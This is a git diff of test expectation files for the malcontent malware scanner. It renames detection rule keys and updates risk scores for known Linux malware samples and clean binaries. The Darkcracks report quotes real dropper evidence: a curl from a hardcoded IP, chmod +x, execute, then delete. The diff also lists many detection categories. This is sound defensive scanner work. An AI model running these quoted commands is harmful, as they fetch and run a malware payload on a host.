-| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | |
-| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
+| RISK | KEY | DESCRIPTION | EVIDENCE |
+|----------|----------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------|----------|
+| CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
+| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
diff --git a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff
index 50848ad7d..cf673d234 100644
--- a/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff
+++ b/tests/linux/2023.FreeDownloadManager/freedownloadmanager.sdiff
@@ -11,11 +11,12 @@
 +anti-static/base64/exec
 +anti-static/base64/http_agent
 +data/base64/external
++data/embedded/base64_elf
 +data/embedded/base64_terms
 +data/embedded/base64_url
 +data/embedded/pgp_key
 +data/encoding/base64
-+evasion/hidden_paths/var_tmp
++evasion/file/location/var_tmp
 +exec/install_additional/add_apt_key
 +exec/shell/exec
 +exec/shell/ignore_output
@@ -28,7 +29,9 @@
 +fs/path/usr_bin
 +fs/path/var
 +fs/permission/modify
++impact/remote_access/botnet
 +net/download
 +net/url/embedded
-+persist/cron/echo_tab
++persist/cron/etc_d
 +persist/cron/tab
++sus/geopolitics
diff --git a/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple b/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple
index 83d98a90b..10f71a219 100644
--- a/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple
+++ b/tests/linux/2023.Gafgyt/5636cddb43.elf.x86.simple
@@ -15,6 +15,7 @@ fs/path/usr_sbin_telnetd: high
 fs/proc/net_route: high
 impact/ddos: critical
 impact/ddos/raw_flooder: medium
+lateral/scan/tool: medium
 net/dns/servers: low
 net/http/fake_user_agent: medium
 net/ip/parse: medium
diff --git a/tests/linux/2023.Kinsing/install.sh.simple b/tests/linux/2023.Kinsing/install.sh.simple
index ed250bc6d..37a0c28f7 100644
--- a/tests/linux/2023.Kinsing/install.sh.simple
+++ b/tests/linux/2023.Kinsing/install.sh.simple
@@ -19,10 +19,10 @@ evasion/bypass_security/linux/iptables: medium
 evasion/bypass_security/linux/se: medium
 evasion/bypass_security/linux/se_disable: high
 evasion/bypass_security/linux/ufw: medium
-evasion/covert_location/dev_shm: critical
-evasion/hidden_paths/dev_shm: critical
-evasion/hidden_paths/hidden: high
-evasion/hidden_paths/var_tmp: medium
+evasion/file/location/dev_shm: critical
+evasion/file/location/var_tmp: medium
+evasion/file/prefix/dev: critical
+evasion/file/prefix/tmp: high
 evasion/hijack_execution/etc_ld.so.preload: high
 evasion/logging/syslog: medium
 evasion/mimicry/fake_process: critical
@@ -56,16 +56,16 @@ impact/cryptojacking/cryptonight: high
 impact/cryptojacking/generic: high
 impact/cryptojacking/monero_pool: medium
 impact/cryptojacking/xmrig: high
+impact/degrade/firewall: high
 impact/degrade/infection: critical
 impact/degrade/linux_paths: high
-impact/degrade/selinux_firewall: high
-impact/degrade/ufw: high
 impact/remote_access/agent: medium
 impact/remote_access/iptables: medium
 impact/remote_access/kill_rm: medium
 net/download: medium
 net/download/fetch: high
 net/url/embedded: low
+persist/cron/etc_d: high
 persist/cron/tab: medium
 persist/daemon: medium
 persist/linux_multi: high
diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md
index 495e7d436..068854e57 100644
--- a/tests/linux/2024.Darkcracks/darkcracks.sh.md
+++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md
@@ -3,7 +3,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | CRITICAL | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#curl_chmod_relative_run_tiny) | change dir, fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code) | -| CRITICAL | [evasion/covert_location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | +| CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /;](https://github.com/search?q=cd+%2F%3B&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | | CRITICAL | [evasion/self_deletion/run_sleep_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_sleep_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | | HIGH | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v)
[http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl) |
diff --git a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
index c9be21eeb..a301fce64 100644
--- a/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
+++ b/tests/linux/2024.Kaiji/eight-nebraska-autumn-illinois.simple
@@ -16,12 +16,12 @@ data/compression/gzip: low
 data/encoding/base64: low
 data/hash/md5: low
 discover/network/netstat: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 evasion/bypass_security/linux/se: medium
 evasion/bypass_security/linux/se_disable: high
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 exec/plugin: low
 exec/program: medium
 exec/shell/exec: medium
@@ -59,7 +59,7 @@ net/dns: low
 net/dns/servers: low
 net/dns/txt: low
 net/download: medium
-net/download/fetch: medium
+net/download/fetch: high
 net/http/2: low
 net/http/accept_encoding: low
 net/http/auth: low
@@ -88,8 +88,6 @@ net/url/parse: low
 net/url/request: medium
 os/fd/sendfile: low
 os/kernel/netlink: low
-persist/cron/echo_tab: high
-persist/cron/hidden_tab: critical
-persist/cron/tab: medium
+persist/cron/tab: critical
 persist/daemon: medium
 process/groups_set: low
diff --git a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
index 0489009db..3152b473a 100644
--- a/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
+++ b/tests/linux/2024.TellYouThePass/uranus-ack-mike-cat.simple
@@ -14,12 +14,12 @@ data/encoding/base64: low
 data/encoding/json: low
 data/encoding/json_decode: low
 data/hash/md5: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/plugin: low
 exec/program: medium
diff --git a/tests/linux/2024.chisel/crondx.simple b/tests/linux/2024.chisel/crondx.simple
index 3c58b6b40..3afefaff8 100644
--- a/tests/linux/2024.chisel/crondx.simple
+++ b/tests/linux/2024.chisel/crondx.simple
@@ -13,8 +13,8 @@ data/compression/gzip: low
 data/encoding/base64: low
 data/encoding/json: low
 data/hash/md5: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 exec/plugin: low
 exec/program: medium
diff --git a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
index 456a2d854..4210546ff 100644
--- a/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
+++ b/tests/linux/2024.clobber_xmrig/cba8d79949adc3c56c02fee56644f4084b7471bc5aed1c81803054f017240a72.simple
@@ -21,11 +21,11 @@ data/encoding/json_decode: low
 data/hash/md5: low
 discover/ip/public: high
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/user/HOME: low
 evasion/bypass_security/linux/pam: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/logging/acct: low
 exec/plugin: low
 exec/system_controls/systemd: medium
diff --git a/tests/linux/2024.gas/gas.simple b/tests/linux/2024.gas/gas.simple
index 2765835ac..599e81b10 100644
--- a/tests/linux/2024.gas/gas.simple
+++ b/tests/linux/2024.gas/gas.simple
@@ -1,7 +1,8 @@
 # linux/2024.gas/gas: high
 anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
+discover/system/dev_full: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
@@ -25,9 +26,7 @@ fs/proc/sys_kernel_osrelease: medium
 fs/tempdir: low
 fs/tempdir/TMPDIR: low
 hw/cpu: medium
-impact/exploit/GCONV_PATH: low
 impact/remote_access/dl_iterate: high
-impact/remote_access/reverse_shell: medium
 net/socket/send: low
 net/url/embedded: low
 process/create: low
diff --git a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple
index 7010cb07e..e5453d82d 100644
--- a/tests/linux/2024.hadooken/crondr_as_bash.sh.simple
+++ b/tests/linux/2024.hadooken/crondr_as_bash.sh.simple
@@ -1,5 +1,5 @@
 # linux/2024.hadooken/crondr_as_bash.sh: critical
-evasion/covert_location/chdir_unusual: high
+evasion/file/location/chdir_unusual: high
 evasion/mimicry/fake_process: high
 evasion/self_deletion/copy_run_delete: critical
 exec/shell/exec: medium
diff --git a/tests/linux/2024.hadooken/ssh_worm.sh.simple b/tests/linux/2024.hadooken/ssh_worm.sh.simple
index d918a8b0e..84202d84b 100644
--- a/tests/linux/2024.hadooken/ssh_worm.sh.simple
+++ b/tests/linux/2024.hadooken/ssh_worm.sh.simple
@@ -9,7 +9,7 @@ credential/ssh: high
 data/base64/external: medium
 data/embedded/base64_url: medium
 data/encoding/base64: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 exec/shell/pipe_sh: medium
 exec/shell/tmp_semicolon: high
 exfil/stealer/linux_server: high
diff --git a/tests/linux/2024.k4spreader/degrader.sh.simple b/tests/linux/2024.k4spreader/degrader.sh.simple
index 5d6c337f8..5da701263 100644
--- a/tests/linux/2024.k4spreader/degrader.sh.simple
+++ b/tests/linux/2024.k4spreader/degrader.sh.simple
@@ -4,5 +4,4 @@ evasion/bypass_security/linux/ufw: medium
 evasion/hijack_execution/etc_ld.so.preload: high
 fs/attributes/chattr: medium
 fs/path/etc: low
-impact/degrade/iptables: high
-impact/degrade/ufw: high
+impact/degrade/firewall: high
diff --git a/tests/linux/2024.k4spreader/knlib.simple b/tests/linux/2024.k4spreader/knlib.simple
index 435f19650..fd69bf578 100644
--- a/tests/linux/2024.k4spreader/knlib.simple
+++ b/tests/linux/2024.k4spreader/knlib.simple
@@ -1,5 +1,5 @@
 # linux/2024.k4spreader/knlib: critical
-evasion/covert_location/chdir_unusual: high
+evasion/file/location/chdir_unusual: high
 evasion/self_deletion/copy_run_delete: critical
 exec/shell/exec: medium
 exec/shell/ignore_output: medium
diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json
index 462a28c6a..baa2a4b88 100644
--- a/tests/linux/2024.kubo_injector/injector.json
+++ b/tests/linux/2024.kubo_injector/injector.json
@@ -15,26 +15,30 @@
 {
 "Description": "may inject code into other processes",
 "MatchStrings": [
-"/proc/%d/maps",
-"process",
-"ptrace"
+"/proc",
+"maps",
+"successfully injected",
+"to inject",
+"to-inject"
 ],
 "RiskScore": 3,
 "RiskLevel": "HIGH",
-"RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/process-inject.yara#ptrace_injector",
+"RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/process-inject.yara#library_injector",
 "ID": "evasion/process_injection/process_inject",
-"RuleName": "ptrace_injector"
+"RuleName": "library_injector"
 },
 {
-"Description": "trace or modify system calls",
+"Description": "may inject code into other processes",
 "MatchStrings": [
+"/proc/%d/maps",
+"process",
 "ptrace"
 ],
-"RiskScore": 2,
-"RiskLevel": "MEDIUM",
-"RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace",
+"RiskScore": 3,
+"RiskLevel": "HIGH",
+"RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace_injector",
 "ID": "evasion/process_injection/ptrace",
-"RuleName": "ptrace"
+"RuleName": "ptrace_injector"
 },
 {
 "Description": "get the address of a symbol",
@@ -85,17 +89,6 @@
 "ID": "fs/proc/arbitrary_pid",
 "RuleName": "proc_arbitrary"
 },
-{
-"Description": "accesses underlying executable of other processes",
-"MatchStrings": [
-"/proc/%s/exe"
-],
-"RiskScore": 3,
-"RiskLevel": "HIGH",
-"RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-exe.yara#proc_exe",
-"ID": "fs/proc/pid_exe",
-"RuleName": "proc_exe"
-},
 {
 "Description": "access process memory maps",
 "MatchStrings": [
diff --git a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
index cee09e8ae..f7983ea6d 100644
--- a/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
+++ b/tests/linux/2024.kworker_pretenders/emp3r0r.agent.simple
@@ -6,7 +6,6 @@
 anti-behavior/vm_check: medium
 c2/addr/http_dynamic: medium
 c2/addr/ip: medium
-c2/addr/url: high
 c2/discovery/ip_dns_resolver: medium
 c2/tool_transfer/download: medium
 collect/archives/unarchive: medium
@@ -32,19 +31,20 @@ data/encoding/json_decode: low
 data/hash/blake2b: low
 data/hash/md5: low
 data/hash/sha256: low
+discover/network/connectivity: low
 discover/network/netstat: medium
 discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
-evasion/covert_location/chdir_unusual: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/dev_shm: critical
-evasion/hidden_paths/hidden: high
+evasion/file/location/chdir_unusual: medium
+evasion/file/location/dev_shm: medium
+evasion/file/prefix/dev: critical
+evasion/file/prefix/tmp: high
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/logging/current_logins: medium
 evasion/logging/hide_shell_history: high
@@ -125,7 +125,6 @@ net/ip/host_port: medium
 net/ip/icmp: medium
 net/ip/multicast_send: low
 net/ip/parse: medium
-net/ip/spoof: medium
 net/ip/tcp_state_tracker: medium
 net/proxy/shadowsocks: high
 net/proxy/socks5: medium
diff --git a/tests/linux/2024.kworker_pretenders/gafgyt.simple b/tests/linux/2024.kworker_pretenders/gafgyt.simple
index d05ad257d..709a44a35 100644
--- a/tests/linux/2024.kworker_pretenders/gafgyt.simple
+++ b/tests/linux/2024.kworker_pretenders/gafgyt.simple
@@ -1,13 +1,14 @@
 # linux/2024.kworker_pretenders/gafgyt: critical
 3P/elastic/mirai: critical
 3P/threat_hunting/base64: medium
-anti-static/packer/elf: high
+anti-static/elf/content: high
 credential/ssh/d: medium
 data/base64/external: medium
 data/encoding/base64: low
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/var_run: medium
-evasion/hidden_paths/var_tmp: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/multiple: high
+evasion/file/location/var_run: medium
+evasion/file/location/var_tmp: medium
 evasion/mimicry/fake_process: critical
 exec/shell/echo: medium
 exec/shell/exec: medium
@@ -26,6 +27,7 @@ fs/proc/self_exe: medium
 net/dns/servers: low
 net/http/request: low
 net/socket/send: low
+persist/cron/etc_d: high
 persist/cron/tab: medium
 persist/daemon: medium
 process/executable_path: low
diff --git a/tests/linux/2024.medusa/rkload.simple b/tests/linux/2024.medusa/rkload.simple
index 79a6bc7ad..af8c2f55f 100644
--- a/tests/linux/2024.medusa/rkload.simple
+++ b/tests/linux/2024.medusa/rkload.simple
@@ -4,20 +4,25 @@ anti-behavior/LD_DEBUG: medium
 anti-behavior/LD_PROFILE: medium
 anti-static/xor/commands: high
 credential/ssh/d: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
+discover/system/dev_full: low
 discover/system/sysinfo: medium
-evasion/covert_location/dev_shm: high
-evasion/hidden_paths/dev_shm: critical
-evasion/hidden_paths/hidden: high
-evasion/hide_artifacts/system_directories: medium
+evasion/file/location/dev_shm: high
+evasion/file/location/lib: high
+evasion/file/location/system_directory: medium
+evasion/file/prefix: high
+evasion/file/prefix/dev: critical
+evasion/file/prefix/lib: high
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/hijack_execution/etc_ld.so.preload: medium
+evasion/rootkit/userspace: critical
 exec/conditional/LANG: low
 exec/dylib/address_check: low
 exec/dylib/symbol_address: medium
 exec/program: medium
 exec/program/background: low
 exec/shell/exec: medium
+exfil/stealer/ssh: high
 fs/attributes/set: medium
 fs/directory/create: low
 fs/file/copy: medium
@@ -35,9 +40,6 @@ fs/proc/stat: medium
 fs/tempdir: low
 fs/tempdir/TMPDIR: low
 hw/cpu: medium
-impact/exploit/GCONV_PATH: low
-impact/remote_access/reverse_shell: medium
-impact/rootkit/readdir_interceptor: high
 malware/family/medusa: critical
 net/socket/local_addr: low
 net/socket/send: low
diff --git a/tests/linux/2024.miner_dropper/drop.sh.simple b/tests/linux/2024.miner_dropper/drop.sh.simple
index ed3045bb0..8f15244cb 100644
--- a/tests/linux/2024.miner_dropper/drop.sh.simple
+++ b/tests/linux/2024.miner_dropper/drop.sh.simple
@@ -1,7 +1,7 @@
 # linux/2024.miner_dropper/drop.sh: critical
 c2/addr/ip: high
 c2/tool_transfer/shell: critical
-evasion/covert_location/chdir_unusual: critical
+evasion/file/location/chdir_unusual: critical
 exec/shell/busybox_exec: high
 exec/shell/exec: medium
 exec/shell/relative_semicolon: high
diff --git a/tests/linux/2024.sbcl.market/sbcl.sdiff b/tests/linux/2024.sbcl.market/sbcl.sdiff
index f2962b838..a24fab7f3 100644
--- a/tests/linux/2024.sbcl.market/sbcl.sdiff
+++ b/tests/linux/2024.sbcl.market/sbcl.sdiff
@@ -2,7 +2,7 @@
 -data/compression/zstd
 -discover/user/HOME
 -discover/user/USER
--evasion/hidden_paths/var_tmp
+-evasion/file/location/var_tmp
 -exec/dylib/address_check
 -exec/dylib/symbol_address
 -exec/program
@@ -19,12 +19,12 @@
 -fs/symlink_resolve
 -net/url/embedded
 +++ added: sbcl.dirty
-+anti-static/packer/high_entropy
++anti-static/elf/entropy
 +data/compression/zstd
 +data/embedded/zstd
 +discover/user/HOME
 +discover/user/USER
-+evasion/hidden_paths/var_tmp
++evasion/file/location/var_tmp
 +exec/dylib/address_check
 +exec/dylib/symbol_address
 +exec/program
diff --git a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple
index 43567cf92..4d90726f1 100644
--- a/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple
+++ b/tests/linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf.simple
@@ -1,6 +1,7 @@
 # linux/2024.sliver/de33b8d9694b6b4c44e3459b2151571af5d0e2031551f9f1a70b6db475ba71b2.elf: critical
-anti-static/packer/elf: high
-anti-static/packer/high_entropy: medium
+anti-static/elf/content: high
+anti-static/elf/entropy: high
+anti-static/elf/header: high
 anti-static/packer/upx: high
 c2/addr/ip: high
 credential/sniffer/bpf: medium
diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md
index d9e616d5f..08b10ab08 100644
--- a/tests/linux/UPX/06ed158.md
+++ b/tests/linux/UPX/06ed158.md
@@ -1,10 +1,11 @@ ## linux/UPX/06ed158 [😈 CRITICAL] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|-------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------| -| HIGH | [anti-static/packer/elf](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/elf.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | -| HIGH | [anti-static/packer/high_entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/high_entropy.yara#high_entropy_7_9) | high entropy binary (>7.9) | | -| HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) | -| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | -| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|--------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------|------------------------------------------------------| +| HIGH | [anti-static/elf/content](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/content.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | | +| HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_4) | high entropy ELF binary 
(>7.4) | | +| HIGH | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#high_entropy_header) | high entropy ELF header (>7) | | +| HIGH | [anti-static/packer/upx](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/packer/upx.yara#upx) | Binary is packed with UPX | [UPX!](https://github.com/search?q=UPX%21&type=code) | +| MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | | +| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | diff --git a/tests/linux/clean/appsec-rules.json.simple b/tests/linux/clean/appsec-rules.json.simple index 21880ef60..4a34603df 100644 --- a/tests/linux/clean/appsec-rules.json.simple +++ b/tests/linux/clean/appsec-rules.json.simple @@ -19,16 +19,16 @@ data/compression/bzip2: low data/compression/lzma: low data/compression/zstd: low data/encoding/base64: low -discover/system/network: high +discover/multiple: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low evasion/process_injection/readelf: medium exec/plugin: low -exec/shell/bash_dev_tcp: high exec/shell/bash_dev_udp: medium exec/shell/nohup: medium exec/system_controls/apparmor: medium @@ -54,6 +54,7 @@ impact/exploit/cve: medium impact/remote_access/iptables: medium net/dns/servers: low net/download: medium +net/ftp/t: low net/http/cookies: medium net/socket/connect: medium net/tcp/sftp: medium diff --git a/tests/linux/clean/busybox.simple b/tests/linux/clean/busybox.simple index 9c9a4fa2a..d289770c8 100644 
--- a/tests/linux/clean/busybox.simple
+++ b/tests/linux/clean/busybox.simple
@@ -8,10 +8,12 @@ data/compression/lzma: low
 data/encoding/base64: low
 data/random/insecure: low
 discover/group/lookup: medium
-discover/network/interface_get: low
+discover/network/interface: low
 discover/network/netstat: medium
+discover/process/parent: low
 discover/processes/pgrep: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
+discover/system/dmesg: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
@@ -88,5 +90,4 @@ process/executable_path: low
 process/groupid_set: low
 process/groups_set: low
 process/namespace_set: low
-process/parent_pid_get: low
 process/userid_set: low
diff --git a/tests/linux/clean/caddy.simple b/tests/linux/clean/caddy.simple
index 5ee09852f..fa1845840 100644
--- a/tests/linux/clean/caddy.simple
+++ b/tests/linux/clean/caddy.simple
@@ -38,14 +38,15 @@ discover/cloud/aws_metadata: low
 discover/cloud/google_metadata: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/process/parent: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/install_additional/package_install: medium
@@ -147,6 +148,5 @@ persist/pid_file: medium
 privesc/sudo: medium
 process/chroot: low
 process/groups_set: low
-process/parent_pid_get: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/linux/clean/chezmoi.simple b/tests/linux/clean/chezmoi.simple
index c2698a743..97c25b8fa 100644
--- a/tests/linux/clean/chezmoi.simple
+++ b/tests/linux/clean/chezmoi.simple
@@ -46,14 +46,15 @@ data/hash/md5: low
 data/random/insecure: low
 discover/group/lookup: medium
 discover/network/mac_address: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/process/parent: low
+discover/system/cpu: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 exec/cmd: medium
 exec/conditional/LANG: low
 exec/plugin: low
@@ -153,7 +154,6 @@ privesc/sudo: medium
 process/chdir: low
 process/chroot: low
 process/groups_set: low
-process/parent_pid_get: low
 sus/exclamation: medium
 sus/intercept: medium
 sus/malicious: medium
diff --git a/tests/linux/clean/chrome.simple b/tests/linux/clean/chrome.simple
index ef7e5ac8b..4dbc704d1 100644
--- a/tests/linux/clean/chrome.simple
+++ b/tests/linux/clean/chrome.simple
@@ -6,9 +6,9 @@ anti-behavior/LD_PROFILE: medium
 anti-static/obfuscation/obfuscate: low
